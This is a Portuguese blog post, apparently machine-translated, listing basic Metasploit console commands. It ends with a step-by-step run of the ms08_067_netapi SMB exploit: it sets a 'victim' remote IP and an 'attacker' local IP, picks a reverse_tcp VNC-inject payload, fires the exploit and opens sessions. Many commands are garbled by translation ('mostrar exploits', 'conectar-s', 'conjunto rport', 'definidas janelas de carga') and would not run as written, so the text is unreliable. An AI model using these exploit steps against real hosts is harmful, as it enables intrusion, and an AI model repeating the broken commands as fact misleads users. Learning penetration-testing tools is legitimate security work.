Metasploit Comando Básico


Msfconsole
Msfconsole é um console ou um comando do Windows de metasploit que lhe dará o apoio completo de comandos internos e externos Metasploit, houve uma interface web de metasploit mas agora não temos essa opção.
Assim, no seu terminal tipo msfconsole para iniciar a consola metasploit.
root @ bt: ~ # msfconsole
Metasploit também está disponível no GUI (graphical user interface), se você deseja executar GUI metasploit do que no tipo de terminal.
root @ bt: ~ # msfgui

Ajuda comando de metasploit lhe dará a idéia básica sobre o uso de metasploit, se você está procurando ajuda msfconsole do que do tipo de janelas de raiz
root @ bt: ~ # msfconsole -h
Para o uso msfconsole você precisa estar na janela msfconsole para obter a ajuda.
msf> help
Conecte comando é nada, mas o suplente telnet e NCAT em ​​metasploit, use o comando Conectar para se conectar com o host remoto e local sobre metasploit você pode definir o IP da máquina host.
msf> conectar-s www.metasploit.com 443
[*] Conectado a www.metasploit.com:443
GET / HTTP / 1.0
-s → SSL
Comando ping de msfconsole é verificar o anfitrião vivo e assim por diante.
msf> ping 192.168.1.45
Mostrar exploits é um comando para verificar todos os exploits disponíveis no metasploit
msf> mostrar exploits
Mostrar cargas úteis apenas como mostram façanhas, show payloads irá mostrar-lhe todas as cargas disponíveis no Metasploit.
msf> show payloads
Informações comando vai lhe dar mais informações sobre quaisquer exploits e payloads.
Msf> info <explorar>
msf> info <payload>
Use o comando vai dar metasploit uma instrução para usar um 'exploit' ou carga útil.
msf> uso explorar / windows / SMB / ms08_067_netapi
MSF exploit (ms08_067_netapi)>
MSF explorar (ms08_067_netapi)> Opções do show para mostrar as opções disponíveis
MSF exploit (ms08_067_netapi)> set RHOST 119.67.45.2 → Para definir IP remoto (vítima IP)
MSF exploit (ms08_067_netapi)> set lhost 192.168.1.45 → Para definir IP local (atacante IP)
MSF exploit (ms08_067_netapi)> conjunto rport 445 → Para definir o número da porta do host remoto
MSF exploit (ms08_067_netapi)> set lport 443 → Para definir o número da porta do host local
MSF exploit (ms08_067_netapi)> definidas janelas de carga / vncinject / reverse_tcp_dns → Tp conjunto payload

MSF exploit (ms08_067_netapi)> unset RHOST → Para remover RHOST
MSF exploit (ms08_067_netapi)> unset lhost → Para remover host local
MSF exploit (ms08_067_netapi)> explorar → Para executar explorar
MSF exploit (ms08_067_netapi)> voltar → Para voltar na janela principal
MSF explorar (ms08_067_netapi)> Sessões -l → Para verificar qualquer sessão ativa
MSF explorar (ms08_067_netapi)> Sessões -i ID → Para ir em um ID de sessão ativa deve ser o número numérico

Free Online Security Training – Metasploit Unleashed: Aqui
Postagem mais recente Postagem mais antiga Página inicial

Populares

Recente

Software Avançado De Investigação Forense Móvel

O MOBILedit Forensics é um software forense avançado para telefones, que  extrai  e  analisa profundamente o conteúdo do telefone,  incluind...